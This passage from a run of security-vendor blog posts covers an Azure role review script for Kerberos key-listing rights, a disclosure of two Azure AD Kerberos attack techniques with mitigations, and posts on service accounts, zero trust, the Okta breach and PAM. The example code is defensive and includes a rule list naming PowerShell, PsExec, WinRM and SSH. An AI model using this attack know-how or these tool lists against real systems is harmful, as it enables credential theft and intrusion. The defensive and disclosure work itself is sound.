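    "Reader": {"Actions": ["*/read"], "NotActions": []},
    "Storage Ops (custom, constructed)": {
        "Actions": ["Microsoft.ClassicStorage/storageAccounts/*"],
        "NotActions": [LISTKEYS_ACTION],          # explicitly carved out
    },
    "Key Reader (custom, constructed)": {
        "Actions": [LISTKEYS_ACTION],
        "NotActions": [],
    },
}

# Constructed scopes (placeholder subscription ids, not real ones).
SUB = "/subscriptions/11111111-2222-3333-4444-555555555555"
RG = SUB + "/resourceGroups/rg-files"
ACCOUNT = RG + "/providers/Microsoft.ClassicStorage/storageAccounts/kerbfiles01"

# Constructed role assignments: (principal, role name, scope).
ASSIGNMENTS = [
    ("alice@corp.example", "Owner", SUB),
    ("bob@corp.example", "Storage Ops (custom, constructed)", RG),
    ("carol@corp.example", "Reader", ACCOUNT),
    ("dave@corp.example", "Key Reader (custom, constructed)", ACCOUNT),
    ("erin@corp.example", "Owner", "/subscriptions/99999999-0000-0000-0000-000000000000"),
]


def matches(pattern, action):
    """Azure-style wildcard match: '*' spans '/' segments and comparison ignores case."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def role_grants(role, action):
    """A role grants an action when some Actions pattern matches and no NotActions pattern does."""
    allowed = any(matches(p, action) for p in role["Actions"])
    denied = any(matches(p, action) for p in role["NotActions"])
    return allowed and not denied


def scope_contains(assignment_scope, resource_scope):
    """An assignment applies to a resource at or below its scope."""
    a = assignment_scope.lower().rstrip("/")
    r = resource_scope.lower()
    return r == a or r.startswith(a + "/")


def principals_with_action(assignments, roles, action, resource_scope):
    """Sorted list of principals able to perform `action` on `resource_scope`."""
    return sorted({
        principal
        for principal, role_name, scope in assignments
        if scope_contains(scope, resource_scope) and role_grants(roles[role_name], action)
    })


if __name__ == "__main__":
    for p in principals_with_action(ASSIGNMENTS, ROLES, LISTKEYS_ACTION, ACCOUNT):
        print("can extract Kerberos keys:", p)
```

Run against real data, the same logic would take role definitions and assignments exported from Azure; the point of the example is that wildcard actions and NotActions carve-outs make the effective permission set non-obvious, so the review has to be computed rather than read off the assignment list. Here the inherited Owner at subscription scope (alice) and the explicit custom role (dave) can list keys, while bob's broad storage role cannot because of its NotActions entry.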
Microsoft made security enhancements to this cloud variant of Kerberos; however, the attacks lie in the underlying logic of how the protocol operates, so fixing them would require Kerberos to be significantly re-engineered. It is not simply a case of patching flawed code. We have developed two variants of Pass the Ticket and Silver Ticket that work for Azure AD Kerberos. We named them Bounce the Ticket and Silver Iodide. These attacks expose infrastructure hosted by Azure, such as servers and storage, to malicious access. You can read the full technical analysis in this white paper.

In accordance with responsible disclosure, both techniques were shared with Microsoft's MSRC team prior to publication. We would like to share our appreciation for the time and effort the company took to assess our research. As there is no specific fix, Silverfort urges enterprises to perform the following mitigations:

- Review and monitor for any changes to Azure Access Control (IAM) and the share's access control permissions to validate that only authorized users have permissions for the Microsoft.ClassicStorage/storageAccounts/listKeys/action (Kerberos key extraction) operation.
- To avoid the Bounce the Ticket attack, reduce the number of computers allowed to hold cloud TGTs to the minimum required. You can do that by restricting the "Allow retrieving the Azure AD Kerberos Ticket Granting Ticket during logon" group policy to security groups that use Azure AD Kerberos.

Read the full white paper here.

---

- Published: 2023-01-19
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/whats-new-with-silverforts-service-accounts-protection-capabilities/

The new year has only just begun, and thanks to the ongoing work of the Silverfort team and feedback from our customers, we have released our latest product version, 4.7. We revamped the screen look and feel and introduced new features and capabilities for our service account offering, which we are thrilled to share.
This is a major step in a multi-layered effort to overhaul and continuously improve Silverfort's service account feature. You can upgrade your Silverfort platform to the latest version, 4.7, and see the new service account capabilities in action. But let's take a closer look at a few of the main new features.

### New Look & Feel

Hello darkness, my old friend. We at Silverfort are continuously committed to making light work of detecting and protecting service accounts. Today, we're happy to announce our new dark mode for the service account screen.

Silverfort's Service Account Screen

#### Why Dark Mode?

Many users have come to expect dark mode options in the solutions they use, ourselves included. It can be a bit disorienting to have a single tool you use all day be in light mode when much of your workflow outside of it remains dark. Naturally, we wanted to ensure that moment is no longer a part of your life working with your service accounts. Hence: Dark Mode for service accounts with Silverfort!

### New Categorization of Service Accounts

When organizations deploy hundreds or thousands of service accounts, it is challenging to know where to start securing them.
To help admins prioritize which accounts they should be dealing with, Silverfort sorts each service account into one of the following categories:

- Machine to machine (M2M): used exclusively by machines to interact with other machines or services (for example, a web container that communicates with a database container)
- Hybrid: used for M2M access but also used by human users to access resources (for example, database administrators who run scripts from their user accounts to connect to servers)
- Scanners: used from a few devices to communicate with a large number of resources inside a network (for example, a vulnerability scanner)
- Others: including both dormant (inactive) accounts and accounts removed by administrators

Silverfort divides the identified service accounts into categories

By categorizing every service account in use, admins can now easily find and prioritize the service accounts that need to be secured.

### Updated Filtering

Silverfort helps further customize the detection and protection of service accounts. Admins can now filter the list of service accounts for high-priority accounts, newly detected accounts, and accounts with specific risk indicators.

Silverfort's filters to check for new service accounts or investigate risk indicators

### Advanced Data Enrichment

In this latest version update, admins can add the account owner of each service account from their Active Directory. Having an account owner for each service account provides more transparency if any changes are made to the service account and an understanding of who made the modifications. Furthermore, admins can add more account information for each service account by adding text from the service accounts screen. On top of the new service account owner capabilities, we now show the number of hits per source and destination.
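The four categories above, the per-source/destination hit counts, and the protocol-based service account policies described later in this post can all be derived from plain authentication records. The following is an added example written for this page, not Silverfort's detection logic: it categorizes constructed service account authentications, counts hits per (account, source, destination) triple, and flags authentications whose protocol falls outside a per-account allowed set. The records, the thresholds (any interactive logon means human use; at most 2 sources and at least 20 destinations means a scanner; 90 days of silence means dormant) and the allowed-protocol policy are all constructed assumptions for the example.

```python
"""Service account categorization, hit counts and protocol policy (added example)."""
from collections import Counter, defaultdict


def rec(account, src, dst, proto, interactive=False, days_ago=1):
    """Build one constructed authentication record."""
    return {"account": account, "src": src, "dst": dst, "proto": proto,
            "interactive": interactive, "days_ago": days_ago}


# Constructed sample: four accounts with distinct usage patterns.
EVENTS = (
    [rec("svc_web", "web01", "db01", "Kerberos") for _ in range(50)]
    + [rec("svc_web", "web02", "db01", "Kerberos") for _ in range(20)]
    + [rec("svc_dba", "app01", "db01", "Kerberos") for _ in range(10)]
    + [rec("svc_dba", "dba-laptop", "db01", "Kerberos", interactive=True, days_ago=3)]
    + [rec("svc_scan", "scan01", f"host{i:02d}", "NTLM") for i in range(25)]
    + [rec("svc_old", "legacy01", "fileserver", "NTLM", days_ago=200)]
    + [rec("svc_web", "web01", "db01", "NTLM")]   # deviates from svc_web's Kerberos-only policy
)

DORMANT_DAYS = 90               # no authentication for this long => "Others" (dormant)
SCANNER_MAX_SOURCES = 2         # scanners run from a few devices ...
SCANNER_MIN_DESTINATIONS = 20   # ... and talk to many resources

# Constructed allowed-protocol policy; accounts not listed are not policed.
POLICY = {"svc_web": {"Kerberos"}, "svc_scan": {"NTLM"}}


def categorize(events):
    """Return {account: category}, applying the rules in priority order."""
    by_acct = defaultdict(list)
    for e in events:
        by_acct[e["account"]].append(e)
    categories = {}
    for acct, evs in by_acct.items():
        sources = {e["src"] for e in evs}
        destinations = {e["dst"] for e in evs}
        if min(e["days_ago"] for e in evs) > DORMANT_DAYS:
            categories[acct] = "Others"
        elif any(e["interactive"] for e in evs):         # a human logged on with it
            categories[acct] = "Hybrid"
        elif len(sources) <= SCANNER_MAX_SOURCES and len(destinations) >= SCANNER_MIN_DESTINATIONS:
            categories[acct] = "Scanners"
        else:
            categories[acct] = "M2M"
    return categories


def hits(events):
    """Number of authentications per (account, source, destination) triple."""
    return Counter((e["account"], e["src"], e["dst"]) for e in events)


def policy_violations(events, policy=POLICY):
    """Authentications whose protocol is outside the account's allowed set."""
    return [(e["account"], e["src"], e["dst"], e["proto"])
            for e in events
            if e["account"] in policy and e["proto"] not in policy[e["account"]]]


if __name__ == "__main__":
    for acct, cat in sorted(categorize(EVENTS).items()):
        print(f"{acct:10} {cat}")
    for (acct, src, dst), n in hits(EVENTS).most_common(3):
        print(f"{acct} {src} -> {dst}: {n} hits")
    print("policy violations:", policy_violations(EVENTS))
```

The ordering of the checks matters: dormancy is tested first so that an old interactive logon does not keep a dead account classified as Hybrid, and the interactive test precedes the scanner heuristic because a human-used account is a higher priority for review than a noisy one. The single NTLM authentication from `svc_web` is the kind of event a protocol-based policy would block.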
This helps admins prioritize the different sources and destinations that their service accounts connect to, ensuring they are properly monitored and protected.

Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications)

### Service Account Policies Based on Protocols

Service accounts typically use only specific protocols for recurring tasks. This allows admins to create policies that block accounts from using other protocols.

Silverfort shows which policies are connected to each service account

### Faster Detection Time

As we improve the overall features of our service account protection capabilities, we have also improved the time to detect new service accounts. New sources and destinations on existing service accounts will typically appear within 30 minutes. This allows organizations of all sizes to quickly discover and protect their service accounts with the help of Silverfort.

### Stay Tuned for More

At Silverfort, we continue to add new identity protection features for our customers. To learn more about service account detection and protection, read our help center article, and stay tuned for more product updates coming very soon.

---

- Published: 2023-01-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/top-5-identity-protection-challenges-for-manufacturing-companies/

It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations against manufacturing companies daily. What is less commonly known is that the growing share of identity threats within the overall threat landscape collides with security weaknesses unique to this vertical, increasing manufacturers' risk exposure and the potential damage these attacks can cause.
In this post, we'll become familiar with the identity threats that manufacturing environments face, get to know the top five challenges they face when attempting to protect against them, and learn how Silverfort's Unified Identity Protection platform can assist identity and security teams in fully addressing these challenges and keeping their environments secure.

### Manufacturing Threat Landscape

No sector is safe from the threat of incoming cyberattacks. This is especially true for manufacturing organizations, for which the potential outcomes of a successful ransomware attack or data theft are severe due to a low tolerance for downtime and impact on production processes. IBM's X-Force 2022 Threat Intelligence Index showed that manufacturers were the most targeted industry due to a low tolerance for downtime and outdated security controls. Additionally, a Deloitte study highlighted that over 40% of manufacturing firms experienced a cyber-attack in the past year.

Cyber attacks on manufacturing timeline

Manufacturers' physical operations and valuable data have attracted the attention of threat actors, and manufacturers' unwillingness to deploy modern technology across their environments means that ransomware demands are often successful. This new approach has made it difficult for organizations to detect, prevent, and respond to attacks across their hybrid environments. Furthermore, adversaries are increasingly targeting manufacturers' employees to gain access to critical credentials, data, and systems. In manufacturing, employees' threat awareness is generally considered a weak link, the low-hanging fruit for adversaries to target in order to open the door to lateral movement across a manufacturer's environment.

### Manufacturing has an Identity Protection Challenge

Manufacturers are increasingly adding more entry points into their environments, as well as adding partners with unprotected third-party devices.
This leaves manufacturing environments more exposed to incoming identity-based attacks that utilize compromised credentials to gain access to manufacturing enterprise resources. Once a threat actor has gained access using compromised credentials, they gain complete access to different resources, such as legacy applications and systems. This malicious access would be followed by either exfiltration of sensitive IP or extortion under threat of shutting down operations. The typical manufacturer is not equipped with the identity protection controls needed to detect and prevent attacks like the scenario above, where malicious actors authenticate with valid but compromised credentials. This is especially true when it comes to protecting legacy applications.

### The Security Challenges that Manufacturers are Facing

The identity protection challenges that manufacturers face should be a top priority for all manufacturing organizations. Here are the five most concerning identity protection challenges that manufacturers are facing.

#### Legacy Applications Can't be Protected with MFA

Legacy applications were developed long before MFA technology was widely available, so they don't natively support its incorporation into their default authentication process. To integrate MFA into a legacy application, organizations would need to change the application's code, which might disrupt operational continuity and hence is generally avoided. Furthermore, manufacturing applications are typically on-prem and authenticate to Active Directory over the NTLM and Kerberos protocols, which also do not support MFA. Without MFA protection, legacy applications' infrastructure and sensitive data are exposed to any adversary that has gained initial access to the environment and obtained compromised credentials.
#### Restricting Third-Party Access

Manufacturers make extensive use of software that is supported and maintained by third-party providers, who routinely access the environment for maintenance, administration, and management of industrial processes. However, the manufacturer's security team has limited to no control over the security state of third-party users' devices, and very limited visibility into their actions and the risks they are subject to beyond their direct connection to its environment. As a result, threat actors often target the supply chain rather than the direct objective, as they rightly assume it will be easier to compromise. Compromising the third-party vendor's user credentials allows attackers to gain access to the manufacturing environment, especially when least-privileged access is not enforced.

#### Hybrid Environments

A typical manufacturing environment today comprises on-prem workstations and servers (for both the shop floor and the IT network), multi-cloud workloads, and SaaS applications. The fragmentation of these environments puts security teams at a disadvantage in seeing the full context of each user account's behavior, significantly reducing their ability to detect an authentication attempt as malicious and trigger an MFA step-up. Moreover, the core part of this environment, the on-prem Active Directory, doesn't support MFA protection at all. Malicious actors exploit the siloed visibility of each environment to perform hybrid lateral movement attacks, moving between on-prem and cloud uninterrupted.

#### Shared Accounts

The practice of different employees using the same credentials to access an application or machine is common across manufacturing organizations. For example, ten production employees may use the same user credentials to access a machine or a production application.
While having one main account for several employees might be more convenient, it creates major visibility and security risks. A malicious actor only needs to trick one of the employees to gain access to this account and move laterally across the manufacturer's environment.

#### IT/OT Convergence

Information technology (IT) and operational technology (OT) have always worked independently in manufacturing. Across their various physical environments and applications, IT and OT systems were not designed to communicate with each other. As this gap continues to narrow and these networks become more connected, the attack surface for cyber threats is expanding significantly. IT/OT convergence allows OT devices to be reached from the IT network by lateral movement. This motivates malicious actors to target manufacturers, since the simple use of compromised credentials from the IT team can allow them to move laterally across the OT environment.

### The Solution: Silverfort's Unified Identity Protection MFA

Silverfort has pioneered the world's first Unified Identity Protection platform that extends MFA and modern identity security to any user and resource, including the legacy applications that couldn't be protected before. The Silverfort Unified Identity Protection Platform integrates with all Identity Providers (IdPs) in manufacturers' hybrid environments to perform continuous monitoring, risk analysis, and adaptive access policies on all access attempts, made by all users, to all manufacturing resources. With Silverfort, access to resources is never granted based on credentials alone. Rather, Silverfort's risk analysis determines whether to allow access, augment the authentication with MFA verification, or block the access attempt altogether. Apart from the operational simplicity of managing only one solution, Silverfort's architecture enables manufacturers to have full MFA coverage across all on-prem and cloud resources in their hybrid environment.
In this way, Silverfort overcomes all the challenges described in the previous sections:

- Legacy applications: the IdP forwards all access requests to Silverfort, including those made by legacy applications, enabling Silverfort to protect them with MFA regardless of whether the application supports MFA.
- Third-party access: Silverfort doesn't require the installation of agents on the protected devices, enabling it to easily enforce MFA on access attempts to any resource, including those made by external vendors.
- Hybrid environments: Silverfort's integration with all IdPs, on-prem and in the cloud, enables it to monitor and analyze the full authentication trail of every user and extend MFA to the entire on-prem environment, including resources that couldn't be protected before.
- Shared accounts: Silverfort's integration with different MFA tokens allows admins to enroll different tokens for one account to multiple users. Silverfort provides FIDO2 key tokens to solve this issue.
- IT/OT convergence: Silverfort enforces secure authentication and access policies across corporate networks, industrial networks, and cloud environments, including sensitive IT and OT systems that were considered 'unprotectable' until today.

To learn more about how Silverfort can help your manufacturing environments, request a demo here.

---

- Published: 2023-01-10
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/rethinking-your-zero-trust-implementation/

Despite becoming a bit over-marketed, zero trust is still one of the most important cybersecurity approaches for protecting your organization's data, devices, and applications. The basic idea is built around the assumption that every attempt to access your infrastructure is malicious until explicitly proven otherwise, with no exceptions. Organizations have embraced zero trust with enthusiasm, supported by vendors keen to demonstrate how their solutions adhere to the principles of zero trust.
When it comes to zero trust for identity and access management, multi-factor authentication (MFA) has become the tool of choice, with more and more products forcing you to implement MFA rather than making it optional. MFA is a great enabler of zero trust for identity, but in its current form, does it really go far enough or cover enough to truly meet the definition of zero trust? Let's take a closer look at the situation with what might be considered a silly analogy.

Imagine you have a nightclub, and everyone has to line up to get in and show ID. This is the equivalent of a username and password. Your ID is recorded, and you're free to enter – the club knows who you are. Unless, of course, it's a fake or stolen ID. Some people trying to get in might look a bit young or their ID looks a bit suspicious. Perhaps they have been celebrating too hard, or just look like they'll cause trouble, so that triggers an extra check like a second piece of photo ID or a breathalyzer test. This is the equivalent of MFA: fail that and you can't get in. The idea is to trigger that MFA test more often than not, and with this setup, you're feeling good about your nightclub security.

But what about when a VIP arrives? Someone vouches for them, or they get recognized, so they just get ushered straight through. They have privileged access, and this person can seemingly go anywhere or do anything because their "credentials" look right – it must be "them". But are you really sure, given that no proper checks were done? They had the right "username and password", i.e. they looked like someone famous, or someone said they were important.

What about when a patron leaves the building for a couple of minutes and then wants to come back? If you have a pass-out process, you just let them back in, assuming they're the same person as before with the same access rights. But what if it's not the same person?

And here's a scenario you might not have thought about.
You have a maintenance entrance in the back for tradespeople, staff, etc. How many times can someone wearing hi-vis and carrying a ladder get in with no checks? Maybe they have an ID badge on their hi-vis vest, but no one checks it properly. They give the right name, say why they're here and get let in. This is the equivalent of service accounts or PowerShell access. Once in, they can also move about freely with few checks because there's no one guarding the maintenance door.

With all these scenarios, we've assumed that the malicious activity through compromised credentials is going to come through the front door, and if that's well protected, then we've implemented zero trust. However, malicious activity is more often looking for the back doors: areas such as service accounts and access interfaces where traditional MFA can't be applied, and compromised credentials are easier to exploit.

The point is that zero trust means zero trust, but achieving this all-encompassing level of zero trust around identity is hard. However, it's not impossible. Let's look at Silverfort's unique approach to implementing this gold standard of zero trust for identity and access management, one that doesn't require you to re-engineer your environment. We look at three pillars to achieving this standard.

### Pillar 1 | Unification

Unification refers to the ability to consolidate every authentication and access attempt across all on-prem and cloud resources to provide full visibility across your environment. You may have multiple identity access tools, and these attempts could be made by human and machine users (service accounts) through any access interface, using any authentication protocol. So, consolidating and unifying access attempts breaks down these identity silos to enable visibility and protection across the entire IT stack.
On paper, this makes complete sense, but in reality, consolidating multiple authentication tools to gain that valuable single view of all authentication and access attempts is notoriously difficult. Hybrid environments worsen the problem because on-prem and cloud authentication tools don't talk to each other, so any insights gleaned by one tool won't be shared with another. As a result, you can never get that complete picture, and every tool must start its evaluation from scratch. For attackers, the gaps exposed by siloed programs and processes are ripe for exploitation.

### Pillar 2 | Context

Context is the ability to continuously build a behavioral baseline profile for every user account based on its entire authentication activity across all enterprise resources. In this way, context supports reliable and high-precision risk analysis for every new access attempt to determine whether a given user can be trusted to access a resource. In short, context allows us to know whether an authentication is legitimate or not – and not just based on the username or password, but on other parameters such as whether a user's behavior is anomalous.

It's important to note that the ability to create context will only be as good as your unification efforts. Multiple disparate risk evaluation engines acting independently don't allow you to build context around normal user behavior, because even with the best AI model, if it's only ingesting two-thirds of your data, you will have authentication blind spots in the remaining third. Your AI engine needs to see 100% of the data to determine whether a given authentication is legitimate or malicious.

### Pillar 3 | Enforcement

Enforcement refers to the ability to trigger secure access controls via configured policies across every type of user, access interface or resource. It prevents, in real time, any malicious activity that attempts to use compromised credentials to access targeted resources.
In short, Zero Trust enforcement blocks malicious access attempts at the validation point. Existing tools can recognize the problem and provide an alert, but they cannot stop the activity immediately. For example, Active Directory can't block access if the user name and password are correct, and we know that implicitly trusting credentials alone will not protect against identity-based attacks using compromised user credentials. Adding to the problem is the vast number of alerts generated for IT teams across different tools, which makes it easy for an identity alert to be overlooked. You need to be able to combine rule-based enforcement, such as multi-factor authentication, with risk-based enforcement, such as an AI-based risk engine, in order to detect suspicious behavior and apply it to every access attempt in real time.

### Unified Identity Protection Platform: Identity-Based Zero Trust in Practice

Silverfort is the world's first Unified Identity Protection platform that extends your existing MFA solution to all resources and access points to block identity-based attacks. For unification, Silverfort seamlessly integrates with all existing IAM solutions (such as AD, ADFS, RADIUS, Azure AD, Okta, Ping Identity, AWS IAM, etc.), extending coverage to assets that, until today, couldn't be protected. This includes:

- Legacy apps
- IoT devices
- Visibility and policy enforcement for machine-to-machine access
- IT infrastructure, file systems, command-line tools and plenty more

For context and enforcement, Silverfort analyzes all on-premises and cloud environment access requests, enriching them with contextual data and an AI-based risk engine to meticulously assess the risk associated with each access attempt. Appropriate security policies are then applied to allow or deny user access, or to request that the user perform additional authentication to validate their identity before the decision is made.
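As an added illustration of how rule-based and risk-based enforcement combine into a single inline decision (example code written for this page, not Silverfort's engine): each request is scored against the account's behavioral baseline, privileged command-line access always requires MFA, service accounts are blocked rather than prompted, and the outcome is one of allow, MFA or deny. The baselines, host names, protocols and thresholds are constructed assumptions.

```python
"""Added example (not Silverfort's code): an inline access decision that combines
rule-based enforcement (MFA) with risk-based enforcement (deviation from a
behavioral baseline). Hosts, protocols, thresholds and baselines are constructed."""
from dataclasses import dataclass, field


@dataclass
class Baseline:
    """Context pillar: what is normal for one account, built from its past authentications."""
    is_service_account: bool
    usual_sources: set = field(default_factory=set)    # hosts it authenticates from
    usual_targets: set = field(default_factory=set)    # resources it reaches
    usual_protocols: set = field(default_factory=set)  # access interfaces it uses
    usual_hours: range = range(0, 24)                  # hours of day it is active


@dataclass
class AccessRequest:
    user: str
    source: str
    target: str
    protocol: str   # "RDP", "SMB", "Kerberos", "PowerShell", "PsExec", ...
    hour: int       # hour of day, 0-23
    is_privileged: bool = False


# Access interfaces that most MFA products cannot cover and that attackers favor.
COMMAND_LINE_PROTOCOLS = {"PowerShell", "PsExec", "WinRM", "SSH"}
MFA_THRESHOLD = 30   # step up from this score
DENY_THRESHOLD = 60  # block from this score, even with a valid password


def risk_score(req: AccessRequest, base: Baseline) -> int:
    """Risk-based part: each deviation from the baseline adds to the score."""
    score = 0
    if req.source not in base.usual_sources:
        score += 30   # never seen authenticating from this host
    if req.target not in base.usual_targets:
        score += 30   # never seen reaching this resource
    if req.protocol not in base.usual_protocols:
        score += 20   # unusual access interface for this account
    if req.hour not in base.usual_hours:
        score += 10   # outside its normal active hours
    return score


def decide(req: AccessRequest, base: Baseline) -> str:
    """Enforcement pillar: returns "allow", "mfa" or "deny" for one access attempt,
    evaluated inline before the resource is reached."""
    score = risk_score(req, base)
    if base.is_service_account:
        # A service account cannot answer an MFA prompt, so any departure from its
        # machine-to-machine pattern is blocked instead of stepped up.
        return "deny" if score > 0 else "allow"
    if score >= DENY_THRESHOLD:
        return "deny"
    # Rule-based part: privileged users on command-line interfaces always get MFA,
    # however normal the request otherwise looks.
    if req.is_privileged and req.protocol in COMMAND_LINE_PROTOCOLS:
        return "mfa"
    if score >= MFA_THRESHOLD:
        return "mfa"
    return "allow"


# Constructed baselines for one domain admin and one backup service account.
BASELINES = {
    "admin.jane": Baseline(False, {"ws-admin01"}, {"dc01", "file01"},
                           {"RDP", "SMB", "Kerberos"}, range(7, 20)),
    "svc_backup": Baseline(True, {"app01"}, {"sql01"}, {"Kerberos"}),
}


def evaluate(req: AccessRequest) -> str:
    """Looks up the requester's baseline and returns the inline decision."""
    return decide(req, BASELINES[req.user])


if __name__ == "__main__":
    samples = [
        AccessRequest("admin.jane", "ws-admin01", "dc01", "PowerShell", 10, True),  # mfa
        AccessRequest("admin.jane", "ws-unknown", "file01", "SMB", 10, True),       # mfa
        AccessRequest("admin.jane", "ws-unknown", "sql02", "PsExec", 3, True),      # deny
        AccessRequest("svc_backup", "app01", "sql01", "Kerberos", 2),               # allow
        AccessRequest("svc_backup", "ws-admin01", "sql01", "RDP", 14),              # deny
    ]
    for r in samples:
        print(f"{r.user:11s} {r.source:>11s} -> {r.target:6s} via {r.protocol:10s}: {evaluate(r)}")
```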
When Silverfort detects malicious activities, the security teams are immediately notified. Access is denied, and action can be taken, knowing with confidence that it is not a false positive: Silverfort has already completed the necessary groundwork. This is the only real way to implement a practical and actionable Zero Trust identity solution. If you're serious about Zero Trust, Silverfort is the only real solution. For more information or a demonstration visit silverfort.com

---

- Published: 2022-12-22
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/oktas-github-breach-insights-and-recommendations/

As recently reported, Okta experienced a security breach in which the source code for its workforce identity cloud was stolen. As Silverfort partners with Okta to protect our joint customers' workforce identities, we want to share with you our insights regarding this attack and the subsequent precautionary steps organizations should take to strengthen their protection from the potential risk it introduces.

### No Immediate Risk Detected

First, it's important to note that there is no immediate impact to any Okta customers, as Okta has found no unauthorized access to its service or customer data. Okta has taken the correct, responsible measures in response to this breach, including reviewing and fortifying their GitHub security as well as notifying their customers.

### Immediate Concerns and Long-Term Implications

There are, however, potential immediate and long-term implications of this breach. While Okta does not rely on the secrecy of its source code for the security of its services, the leak would enable adversaries to research it for vulnerabilities much more easily. It's highly likely that threat actors are engaged in this type of research right now, already planning the next steps of the attack.
Additionally, considering this is one of several Okta breaches this year, it's likely that attackers are attempting to target Okta customers by compromising Okta's service and infrastructure. Since Okta stores users' passwords, this risk should be addressed.

### Okta Breach Potentially Exposes the Active Directory Environment to Malicious Access

Therefore, Silverfort recommends a zero-trust approach to protect identities in Okta. The most effective solution against compromised passwords is multi-factor authentication (MFA). While Okta provides MFA for its customers' SaaS and web applications, it does not provide similar protection for the Active Directory (AD) environment. Since passwords stored in Okta are usually synced with Active Directory, this lack of MFA creates a critical exposure to malicious access via compromised credentials.

### Silverfort and Okta Integration Protects the Active Directory Environment

The integration between Silverfort and Okta enables Okta users to extend MFA protection to the entire Active Directory environment, creating an additional protection layer to mitigate possible adversary actions following the Okta breach.

### Use Silverfort Free Identity Threat Monitoring to Increase Resilience

Silverfort offers a free 60-day identity threat monitoring package for Okta customers that have their Active Directory and Okta users synced. You can activate this free offering here. With Silverfort, you can perform the following mitigation steps:

Continuous Monitoring

- Attack Surface Management: Monitor any AD-authenticated system, legacy app, command line interface (CLI), or OT system that may have synced passwords with Okta.
- Active Attacks: Monitor for detected identity threats and leverage Silverfort's identity data for a rapid and efficient response.

Figure: Silverfort's Identity Threat Detection Screen

Active MFA Protection

- GitHub will require MFA by the end of 2023, if not sooner. Enable MFA using Okta for all SaaS apps.
- Extend your MFA solution to all on-prem AD-authenticated apps.

Utilizing the Silverfort–Okta integration provides a rapid and safe way to keep your environment secure against any potential identity threats that result from this breach.

---

- Published: 2022-12-08
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/revolutionizing-work-at-silverfort-with-chatgpt/

At Silverfort, we're always looking for ways to improve our work and make it more efficient. Recently, we started using ChatGPT internally and have already seen significant changes in how we do things.

For those who aren't familiar, ChatGPT is a natural language processing (NLP) AI that can generate human-like text. It's been used in a variety of applications, from chatbots to content creation. We're exploring what we can do with it and have already found several ways to incorporate it into our work.

One of the first things we tried was using ChatGPT to improve our interviews. We let it solve a programming interview and were impressed with the results. While the solution wasn't as good as that of a top engineer, with some guidance ChatGPT gave a pretty good answer.

We also tried using ChatGPT in a security researcher interview. While it wasn't able to find the specific vulnerabilities we were looking for, it did point out other potential vulnerabilities in the code that we were unaware of. This shows the potential of ChatGPT to help identify weaknesses in our systems and improve our security.

Another area where we've seen significant benefits is in writing blog posts. Using ChatGPT, we've been able to save an estimated 70% of the time it would normally take to write a post. This has allowed us to produce more content in less time and free up our team to focus on other tasks.

We've also used ChatGPT to figure out how to integrate with other products and for competitive analysis.
In the IT department, it was used to find a solution for controlled and secure partner access to certain systems. And in other departments it was used to write follow-up emails and rephrase answers to security questionnaires.

It's only been 24 hours since we started using ChatGPT, but we're already seeing the potential for it to greatly improve our work at Silverfort. I can only imagine what the next few months will bring as we continue to explore its capabilities.

Of course, there are some caveats to using ChatGPT. It can be overconfident and doesn't always produce content that's correct, so everything it generates needs to be reviewed. But overall, we're very happy with the results we've seen so far and are excited to see what else it can do for us.

And as a final note, ChatGPT was also used to write this blog post, showcasing its ability to generate human-like text for a variety of purposes. We're looking forward to seeing what else it can do for us at Silverfort.

---

- Published: 2022-11-29
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-to-accelerate-the-privileged-access-management-journey/

A robust PAM solution deprives threat actors of the ability to use compromised admin credentials for malicious access and enables organizations to ensure that those who need privileged access get it in a secure manner. However, due to lengthy and complex deployment, PAM programs can often stretch over months and even years, and in many cases are never fully completed. A prominent reason for this complexity is the low or partial visibility identity teams have into the privileged accounts in their environment, especially machine-to-machine service accounts. This post explores this challenge and its implications, and shows how Silverfort's ability to automate the discovery, monitoring, and protection of service accounts enables organizations to successfully take their PAM programs to the finish line.
### The PAM Promise: Real-Time Protection of Privileged Accounts

Privileged Access Management (PAM) solutions have become a key part of a successful cybersecurity strategy. PAM prevents adversaries from using compromised privileged accounts for lateral movement and malicious access by providing these accounts with a dedicated protection layer. It delivers this protection by employing various security measures such as personalization of user access, creation of temporary access accounts, control of the access and use of shared accounts, automated password management, and visibility into connections made by users with privileged access rights. All of these enable PAM solutions to provide real-time protection, preventing identity threats from taking place rather than merely alerting, and keeping access to critical systems, servers, and databases guarded and secure. However, the deployment process of PAM solutions entails severe challenges that often prevent these security advantages from materializing in practice.

### Partial Visibility into Privileged Accounts Prevents PAM Solutions from Delivering on Their Promise

PAM solutions revolve around placing additional protection on your privileged accounts. The caveat is that there is an implicit assumption that you already know which accounts these are. Unfortunately, this is rarely the case, and the common reality is quite the opposite. IAM solutions don't provide an easy and straightforward way to comprehensively discover all privileged accounts in a given environment. This problem further intensifies in the case of service accounts, which cannot be vaulted without an accurate mapping of their dependencies, the systems they interact with, and the apps they support. Placing them in the vault and rotating their password without this knowledge would likely break the systems and apps that use them. So, the only way in which service accounts can gain PAM protection is by acquiring this knowledge manually.
As any member of the identity team will tell you, this task ranges from extremely complex and resource-consuming to downright impossible in most environments.

### The Double Visibility Challenge of Service Accounts: Who They Are and What They Do

Service accounts introduce two unique visibility challenges. First, there is no straightforward way to efficiently filter them from the human-associated accounts. Second, even when a service account is identified as such, there is no easy way to know its dependencies, the machines it connects to, and the application it supports. The visibility challenges with service accounts stem from the following creation and usage patterns:

- Misuse by admins who use their own credentials for machine-to-machine access.
- Misuse by admins who use service accounts interactively.
- The bad practice of sharing the same service account between various applications.
- Lack of documentation of the service account's creation, whether the account was created by installed software or manually by admins to automate management tasks.

All the above patterns result in organizations having partial visibility into their service accounts. Not knowing that a service account exists, or how it is used, prevents organizations from vaulting it and applying password rotation, leaving it exposed to compromise.

### Silverfort Eliminates All Visibility Gaps to Accelerate PAM Journeys and Take Them to the Finish Line

The Silverfort Unified Identity Protection platform enables organizations to overcome this PAM deployment hurdle by providing effortless, automated visibility into all privileged accounts, including both human admins and service accounts.
